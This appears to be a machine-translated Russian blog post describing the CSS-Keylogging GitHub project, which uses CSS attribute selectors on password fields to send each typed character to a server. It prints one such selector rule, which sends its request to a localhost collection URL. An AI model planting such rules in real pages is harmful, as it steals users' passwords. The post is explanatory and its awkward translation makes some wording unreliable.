предисловие
В первый рабочий день в новом году я бродил по гитхабу и нашел очень интересный проект под названиемCSS-Keylogging, это проект, который демонстрирует, как использовать css для получения пароля, введенного пользователем.Этот проект похож на другой очень популярный проект месяц или два назад.CrookedStyleSheetsпохоже, даже возможноCSS-KeyloggingподлежитCrookedStyleSheetsСоздан по вдохновению.
другой css
Когда дело доходит до css, первое впечатление большинства людей в основном сводится к настройке стиля интерфейса, даже не языка, а с непрерывным развитием веб-технологий, его возможности также обновляются с каждым днем, это уже не каскадная таблица стилей. что отвечало лишь самым основным требованиям к компоновке, а что касается новых атрибутов и новых функциональных точек, то автор их не до конца понимает, и их здесь раскрывать неудобно.
Тема вернулась к другому css на githubjbtronicsУчитывая такой ответCrookedStyleSheetsздесь автор напрямую дает проекткитайский документ, в этом документе есть абзац о входном мониторинге, пожалуйста, прочтите его подробно, если вы его уже видели, пожалуйста, пропустите и продолжайте читать последующие части этой статьи.
css монитор кейлоггинга
CSS-KeyloggingПроект использует CSS для мониторинга кейлогинга таким же образом, в основном с помощью селекторов CSS для достижения функций,CSS-KeyloggingБолее разумное использование нескольких селекторов для захвата соответствующих ключевых событий.
Основной код выглядит следующим образом:
input[type="password"][value$="1"] { background-image: url("http://localhost:3000/1"); }Объяснение следующее:
Когда последний символ поля ввода типа «пароль» равен «1», используйте URL-адрес какhttp://localhost:3000/1В этом случае css попытается сделать запрос на получение ресурса, чтобы сервер мог получить запрос на получение, отправленный клиентом.
когдаvalue$="1", мы можем прослушивать ввод пользователя1, то если мы отслеживаем все ключевые символы на клавиатуре, можем ли мы отслеживать все вводимые пользователем клавиши? Ответ — да, этот проект использует скрипт go для обхода таблицы кодов ascii, фиксирует все символы клавиш ввода с клавиатуры и создает следующую таблицу стилей:
Конечно, вы также можете использовать nodejs для создания таблиц стилей, но я до сих пор не понимаю, почему автор использует node для сборки сервера, а затем использует go для написания скриптов. . . Заинтересованные студенты могут клонировать проект и опробовать его.
Суммировать
Чтобы избежать преднамеренной инъекции угона, пожалуйста, обновите https как можно скорее, чтобы этого не произошло, сетевая безопасность везде, я надеюсь, что не буду игнорировать ее выборочно.
Спасибо за прочтение этой статьи отMINFIVEвсе права защищены. При перепечатке просьба указывать источник: MINFIVE (blog.min Five.com/2018/02/23/…)перевод фрагмента кода на 30 секунд